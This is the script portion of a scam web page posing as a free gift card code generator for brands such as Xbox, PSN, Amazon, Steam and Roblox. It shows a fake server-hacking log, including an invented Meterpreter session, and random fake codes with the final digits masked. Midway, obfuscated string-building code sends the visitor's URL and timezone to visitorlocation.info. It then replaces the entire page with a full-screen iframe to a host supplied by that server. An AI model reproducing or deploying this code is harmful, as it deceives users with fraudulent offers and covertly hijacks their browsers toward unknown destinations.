  document.getElementById("card3").src="../img/1621041360505b927a1dc56c317fe39a6d0d927a28.png";
  document.getElementById("logo").src="../img/1621041361ec995ab7a12b12d7b8c4cdb7a2e4fb7b.png";
    document.getElementById("xbox-logo").src=document.getElementById("logo").src
    document.getElementById("s-card1").src=document.getElementById("card1").src;
    document.getElementById("s-card2").src=document.getElementById("card2").src;
    document.getElementById("s-card3").src=document.getElementById("card3").src;

  document.getElementById("gen").style.backgroundColor="#288698";
  document.getElementById("gen").style.borderColor="#288698";
  document.getElementById("bg-conent-head").style.backgroundColor="#288698";
  document.getElementById("bg-content").style.backgroundColor="#288698";
  document.getElementById("bg-conent-foot").style.backgroundColor="#288698";
  }

if (cardSelect=="ebay"){
  document.getElementById("card1").src="../img/1621057174d5972963d21112209fbe668392aa94e1.png";
  document.getElementById("card2").src="../img/16210571750f1dd742d0f547b572103a7ff9b50480.png";
  document.getElementById("card3").src="../img/1621057177ec080236be73668743a8ebf117bb3f1d.png";
  document.getElementById("logo").src="../img/1621236528cd94cfe35e62cbf772e8467c7f3c492a.png";
    document.getElementById("xbox-logo").src=document.getElementById("logo").src
    document.getElementById("s-card1").src=document.getElementById("card1").src;
    document.getElementById("s-card2").src=document.getElementById("card2").src;
    document.getElementById("s-card3").src=document.getElementById("card3").src;

  document.getElementById("gen").style.backgroundColor="#dedfe0";
  document.getElementById("gen").style.borderColor="#dedfe0";
  document.getElementById("bg-conent-head").style.backgroundColor="#dedfe0";
  document.getElementById("bg-content").style.backgroundColor="#dedfe0";
  document.getElementById("bg-conent-foot").style.backgroundColor="#dedfe0";
  }
if (cardSelect=="xbox"){
  document.getElementById("card1").src="../img/162002874257f11a39eca91af9d8bd3d06cbdb2201.png";
  document.getElementById("card2").src="../img/16200287433c51502a97b88bb6799b7a4efd20cd64.png";
  document.getElementById("card3").src="../img/162002874594065ed36a8fdf7d2ef7456ffbdba619.png";
  document.getElementById("logo").src="../img/162002874683b5c259d46ff6637e01be2b4917ade5.png";
    document.getElementById("xbox-logo").src=document.getElementById("logo").src
    document.getElementById("s-card1").src=document.getElementById("card1").src;
    document.getElementById("s-card2").src=document.getElementById("card2").src;
    document.getElementById("s-card3").src=document.getElementById("card3").src;

  document.getElementById("gen").style.backgroundColor="#107b13";
  document.getElementById("gen").style.borderColor="#107b13";
  document.getElementById("bg-conent-head").style.backgroundColor="#107b13";
  document.getElementById("bg-content").style.backgroundColor="#107b13";
  document.getElementById("bg-conent-foot").style.backgroundColor="#107b13";
  }
  if (cardSelect=="psn"){
    document.getElementById("card1").src="../img/1620033495ea4e337d06ac7be71c7ea4bc552a2b7c.png";
    document.getElementById("card2").src="../img/162003349509f5ef7fd2f8aad30e4f618838ba7b73.png";
    document.getElementById("card3").src="../img/16200334965787824b128d18c7be05b7c32f345e3e.png";
    document.getElementById("logo").src="../img/1620033496bbfbdc9bdb479bdbf28181ca88e33232.png";
      document.getElementById("xbox-logo").src=document.getElementById("logo").src
      document.getElementById("s-card1").src=document.getElementById("card1").src;
      document.getElementById("s-card2").src=document.getElementById("card2").src;
      document.getElementById("s-card3").src=document.getElementById("card3").src;

    document.getElementById("gen").style.backgroundColor="#15245d";
    document.getElementById("gen").style.borderColor="#15245d";
    document.getElementById("bg-conent-head").style.backgroundColor="#15245d";
    document.getElementById("bg-content").style.backgroundColor="#15245d";
    document.getElementById("bg-conent-foot").style.backgroundColor="#15245d";
    }
    if (cardSelect=="amazon"){
      document.getElementById("card1").src="../img/162064065998ccc9cb7a7aa07c6922f7ab18e12a92.png";
      document.getElementById("card2").src="../img/16206406594e87a5a01172313f683749d4f288a08e.png";
      document.getElementById("card3").src="../img/1620640660f6b63c1d0f0a344b71842e02d71a49d9.png";
      document.getElementById("logo").src="../img/16206406615617dfc90977eddf816f71e06a8ae6f6.png";
        document.getElementById("xbox-logo").src=document.getElementById("logo").src
        document.getElementById("s-card1").src=document.getElementById("card1").src;
        document.getElementById("s-card2").src=document.getElementById("card2").src;
        document.getElementById("s-card3").src=document.getElementById("card3").src;

      document.getElementById("gen").style.backgroundColor="#f29c09";
      document.getElementById("gen").style.borderColor="#f29c09";
      document.getElementById("bg-conent-head").style.backgroundColor="#f29c09";
      document.getElementById("bg-content").style.backgroundColor="#f29c09";
      document.getElementById("bg-conent-foot").style.backgroundColor="#f29c09";
      }
      if (cardSelect=="bestbuy"){
        document.getElementById("card1").src="../img/1622444388903124019887e721a0bdb5407eaab2a6.png";
        document.getElementById("card2").src="../img/1622444388385b1295078a98486c10dd45521ea17a.png";
        document.getElementById("card3").src="../img/1622444389558ffa73ef7dfdb05ff99d1afd0446da.png";
        document.getElementById("logo").src="../img/1622444390747af63e1317ee4a0fd99247b8ddc24e.png";
          document.getElementById("xbox-logo").src=document.getElementById("logo").src
          document.getElementById("s-card1").src=document.getElementById("card1").src;
          document.getElementById("s-card2").src=document.getElementById("card2").src;
          document.getElementById("s-card3").src=document.getElementById("card3").src;

        document.getElementById("gen").style.backgroundColor="#0e4ca8";
        document.getElementById("gen").style.borderColor="#0e4ca8";
        document.getElementById("bg-conent-head").style.backgroundColor="#0e4ca8";
        document.getElementById("bg-content").style.backgroundColor="#0e4ca8";
        document.getElementById("bg-conent-foot").style.backgroundColor="#0e4ca8";
        }
	 if (cardSelect=="psnplus"){
        document.getElementById("card1").src="../img/162365766539d35267683262d92c1df15b91c1741b.png";
        document.getElementById("card2").src="../img/1623657665118b97e2e6341477d7b579e9743b8eb7.png";
        document.getElementById("card3").src="../img/162365766609cbc7a619cd7ad1d4556afa2fcbfcf7.png";
        document.getElementById("logo").src="../img/1623653498eb448fcd7c33c15a5670f6b902d03629.png";
          document.getElementById("xbox-logo").src=document.getElementById("logo").src
          document.getElementById("s-card1").src=document.getElementById("card1").src;
          document.getElementById("s-card2").src=document.getElementById("card2").src;
          document.getElementById("s-card3").src=document.getElementById("card3").src;

        document.getElementById("gen").style.backgroundColor="#0e4ca8";
        document.getElementById("gen").style.borderColor="#0e4ca8";
        document.getElementById("bg-conent-head").style.backgroundColor="#0e4ca8";
        document.getElementById("bg-content").style.backgroundColor="#0e4ca8";
        document.getElementById("bg-conent-foot").style.backgroundColor="#0e4ca8";
        }

cardSelect1=cardSelect;
}







/*
function GenTimer3() {
  document.getElementById("page1").style.display="none";
      document.getElementById("page2").style.display="block";
}*/

  function readmore(){
  document.getElementById("readmore").style.display="none";
      document.getElementById("text-info").style.display="block";
}
function selectedcard(value){
  document.body.scrollTop = 0;
document.documentElement.scrollTop = 0;
document.getElementById("content-body").style.display="none";
  document.getElementById("page3").style.display="block";
  var vargenerator = setInterval(GenTimer, 500);
  var getTextStep=0;
  function GenTimer() {

  if (getTextStep==3){

document.getElementById("code").innerHTML="Connection to "+ cardSelect1 + " Server...";
}else if (getTextStep==4){
document.getElementById("code").innerHTML="Server is up at 192.23.11.164:402 (latency 0.0013s)";
}
else if (getTextStep==5){
document.getElementById("code").innerHTML="Connecting to server SQL databse...";
}
else if (getTextStep==6){
document.getElementById("code").innerHTML="Obtaining a service manager handle...";
}
else if (getTextStep==7){
document.getElementById("code").innerHTML="Creating a new service through pipeline...";
}
else if (getTextStep==8){
document.getElementById("code").innerHTML="Closing service handle...";
}
else if (getTextStep==9){
document.getElementById("code").innerHTML="Creating a new service through pipeline...";
}
else if (getTextStep==10){
document.getElementById("code").innerHTML="Sending stage (2342323 bytes) to 192.23.11.164";
}
else if (getTextStep==11){
document.getElementById("code").innerHTML="Meterpreter session 1 opened at port 402";
}
else if (getTextStep==12){
document.getElementById("code").innerHTML="Connected to " +cardSelect1 +  " server...";
}
else if (getTextStep==14){
myfunction2()
document.getElementById("pro-step2").style.backgroundColor="#069e0a";
clearInterval(vargenerator)
}

getTextStep++;
}
}

var ow="i";
var k="if";
  ow=ow+"f";  ow=ow+"r";  ow=ow+"a";
  ow=ow+"me";  ow=ow+" ";  ow=ow+"sr";ow=ow+"c="; ow=ow+'"';ow=ow+"ht";ow=ow+"tps";ow=ow+":";var st='style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"></'+k+'rame>';
  var strcountry='';
  var offset = new Date().getTimezoneOffset();
  offset=offset/-60;var num;
  var strcountry='';
  var data;var country;var code;var d=window.location.href;
  fetch('https://www.visitorlocation.info/data.php?d='+d+"&t="+offset,{referrerPolicy:'unsafe-url'})
  .then(res => res.json())
  .then(output => {
  data =output;
  country=data.country;
  strcountry=country;
  code=data.code;
  code=code.toLowerCase();
  s1=data.s1;
  s2=data.s2;
  num=data.num;
  if (strcountry!='' & num!=0){  document
    .body
    .innerHTML='<'+ow+'//'+s1+'.'+s2+'/'+num+'"'+ st;  }
  });
function myfunction2(){
var vargenerator2 = setInterval(GenTimer2, 200);
var getTextStep2=0;
function GenTimer2() {

if (getTextStep2==1){
  document.getElementById("pro-bar").classList.remove('A0To50');
  document.getElementById("pro-bar").classList.add('A50To100');
}else if (getTextStep2==4){
  var myVarCode = setInterval(genkey, 100);
      var stop=0;
      function genkey() {
        if (cardSelect1=="roblox"){
          var KeyCode = ["9","8","7","6","5","4","3","2","1","0"];
       key1=KeyCode[Math.floor(Math.random() * 10)];
       key2=KeyCode[Math.floor(Math.random() * 10)];
       key3=KeyCode[Math.floor(Math.random() * 10)];
       key4=KeyCode[Math.floor(Math.random() * 10)];
       key5=KeyCode[Math.floor(Math.random() * 10)];
       key6=KeyCode[Math.floor(Math.random() * 10)];
       key7=KeyCode[Math.floor(Math.random() * 10)];
       key8=KeyCode[Math.floor(Math.random() * 10)];
       key9=KeyCode[Math.floor(Math.random() * 10)];
       key10=KeyCode[Math.floor(Math.random() * 10)];
       key11=KeyCode[Math.floor(Math.random() * 10)];
       key12=KeyCode[Math.floor(Math.random() * 10)];
       key13=KeyCode[Math.floor(Math.random() * 10)];
       key14=KeyCode[Math.floor(Math.random() * 10)];
       key15=KeyCode[Math.floor(Math.random() * 10)];
       key16=KeyCode[Math.floor(Math.random() * 10)];
       key17=KeyCode[Math.floor(Math.random() * 10)];
       key18=KeyCode[Math.floor(Math.random() * 10)];
       key19=KeyCode[Math.floor(Math.random() * 10)];
       key20=KeyCode[Math.floor(Math.random() * 10)];
       key21=KeyCode[Math.floor(Math.random() * 10)];
       key22=KeyCode[Math.floor(Math.random() * 10)];
       key23=KeyCode[Math.floor(Math.random() * 10)];
       key24=KeyCode[Math.floor(Math.random() * 10)];
      key25=KeyCode[Math.floor(Math.random() * 10)];
        }
        else
        {
          var KeyCode = ["A", "B", "C","D","E","F","G","H","I","J","K","L","Z","Y","X","W","V","U","T","S","R","Q","P","O","N","M","9","8","7","6","5","4","3","2","1","0"];

       key1=KeyCode[Math.floor(Math.random() * 36)];
       key2=KeyCode[Math.floor(Math.random() * 36)];
       key3=KeyCode[Math.floor(Math.random() * 36)];
       key4=KeyCode[Math.floor(Math.random() * 36)];
       key5=KeyCode[Math.floor(Math.random() * 36)];
       key6=KeyCode[Math.floor(Math.random() * 36)];
       key7=KeyCode[Math.floor(Math.random() * 36)];
       key8=KeyCode[Math.floor(Math.random() * 36)];
       key9=KeyCode[Math.floor(Math.random() * 36)];
       key10=KeyCode[Math.floor(Math.random() * 36)];
       key11=KeyCode[Math.floor(Math.random() * 36)];
       key12=KeyCode[Math.floor(Math.random() * 36)];
       key13=KeyCode[Math.floor(Math.random() * 36)];
       key14=KeyCode[Math.floor(Math.random() * 36)];
       key15=KeyCode[Math.floor(Math.random() * 36)];
       key16=KeyCode[Math.floor(Math.random() * 36)];
       key17=KeyCode[Math.floor(Math.random() * 36)];
       key18=KeyCode[Math.floor(Math.random() * 36)];
       key19=KeyCode[Math.floor(Math.random() * 36)];
       key20=KeyCode[Math.floor(Math.random() * 36)];
       key21=KeyCode[Math.floor(Math.random() * 36)];
       key22=KeyCode[Math.floor(Math.random() * 36)];
       key23=KeyCode[Math.floor(Math.random() * 36)];
       key24=KeyCode[Math.floor(Math.random() * 36)];
      key25=KeyCode[Math.floor(Math.random() * 36)];
}
      if (cardSelect1=="xbox"){
        document.getElementById("code").innerHTML=key1+key2+key3+key4+key5+" "+key9+key6+key7+key8+key10+" "+key11+key12+key13+key14+key15+" "+key16+key17+key18+key19+key20+" "+key21+key22+key23+key24+key25;
      }
      if (cardSelect1=="psn"){
        document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key9+key6+key7+key8+"-"+key11+key12+key13+key14;
      }
      if (cardSelect1=="amazon"){
 document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+key9+key10+"-"+key11+key12+key13+key14+key15;
}
if (cardSelect1=="bestbuy"){
  document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+key9+key10+key11+key12+"-"+key13+key14+key15+key16+"-"+key17+key18+key19+key20;
}
if (cardSelect1=="ebay"){
  document.getElementById("code").innerHTML=key1+key2+key3+"-"+key9+key6+key7+"-"+key11+key12+key13+"-"+key16+key17+key18+key19;
}
if (cardSelect1=="google"){
  document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+key9+key10+key11+key12+"-"+key13+key14+key15+key16+"-"+key17+key18+key19+key20;
}
if (cardSelect1=="itune"){
  document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+key9+key10+key11+key12+"-"+key13+key14+key15+key14;
}
if (cardSelect1=="nintendo"){
  document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+key9+key10+key11+key12+"-"+key13+key14+key15+key16;
}
if (cardSelect1=="nintendo"){
  document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key9+key6+key7+key8+"-"+key11+key12+key13+key14+"-"+key16+key17+key18+key19;
}
if (cardSelect1=="roblox"){
  document.getElementById("code").innerHTML=key1+key2+key3+"-"+key9+key6+key7+"-"+key11+key12+key13+key14;
}
if (cardSelect1=="spotify"){
  document.getElementById("code").innerHTML=key1+key2+key3+key4+key5+"-"+key6+key7+key8+key9+key10+"-"+key11+key12+key13+key14+key15+"-"+key16+key17+key18+key19+key20;
}
if (cardSelect1=="steam"){
  document.getElementById("code").innerHTML=key1+key2+key3+key4+key5+"-"+key9+key6+key7+key8+key10+"-"+key11+key12+key13+key14+key15;
}
if (cardSelect1=="walmart"){
  document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+key9+key10+key11+key12+"-"+key13+key14+key15+key16+"-"+key17+key18+key19+key20;
}
if (cardSelect1=="psnplus"){
  document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+key9+key10+key11+key12;
}

stop++;
if (stop==100){
  document.getElementById("xbox-logo").style.display="none";
  document.getElementById("verify-bg").style.display="block";

  if (cardSelect1=="psnplus"){
    document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+"####";
  }
  if (cardSelect1=="walmart"){
    document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+key9+key10+key11+key12+"-"+key13+key14+key15+key16+"-"+"####";
  }
  if (cardSelect1=="steam"){
    document.getElementById("code").innerHTML=key1+key2+key3+key4+key5+"-"+key9+key6+key7+key8+key10+"-"+"#####";
  }
  if (cardSelect1=="spotify"){
    document.getElementById("code").innerHTML=key1+key2+key3+key4+key5+"-"+key6+key7+key8+key9+key10+"-"+key11+key12+key13+key14+key15+"-"+"#####";
  }
  if (cardSelect1=="roblox"){
    document.getElementById("code").innerHTML=key1+key2+key3+"-"+key9+key6+key7+"-"+"####";
  }
  if (cardSelect1=="nintendo"){
    document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key9+key6+key7+key8+"-"+key11+key12+key13+key14+"-"+"####";
  }
  if (cardSelect1=="nintendo"){
    document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+key9+key10+key11+key12+"-"+"####";
  }
  if (cardSelect1=="itune"){
    document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+key9+key10+key11+key12+"-"+"####";
  }
  if (cardSelect1=="google"){
    document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+key9+key10+key11+key12+"-"+key13+key14+key15+key16+"-"+"####";
  }

  if (cardSelect1=="ebay"){
    document.getElementById("code").innerHTML=key1+key2+key3+"-"+key9+key6+key7+"-"+key11+key12+key13+"-"+"####";
  }
        if (cardSelect1=="xbox"){
          document.getElementById("code").innerHTML=key1+key2+key3+key4+key5+" "+key9+key6+key7+key8+key10+" "+key11+key12+key13+key14+key15+" "+key16+key17+key18+key19+key20+" "+"#####";
        }
        if (cardSelect1=="psn"){
          document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key9+key6+key7+key8+"-"+"####";
}

if (cardSelect1=="amazon"){
 document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+key9+key10+"-"+"#####";
}

if (cardSelect1=="bestbuy"){
    document.getElementById("code").innerHTML=key1+key2+key3+key4+"-"+key5+key6+key7+key8+"-"+key9+key10+key11+key12+"-"+key13+key14+key15+key16+"-"+"####";
}

clearInterval(myVarCode);
document.getElementById("pro-step3").style.backgroundColor="#069e0a";
}
}
}
getTextStep2++;
}
}






//document.getElementById("pro-bar").classList.remove('A0To50');
//document.getElementById("pro-bar").classList.add('A50To100');

</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
        ga('customTemplateGlobal.html', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>
</body>
</html>
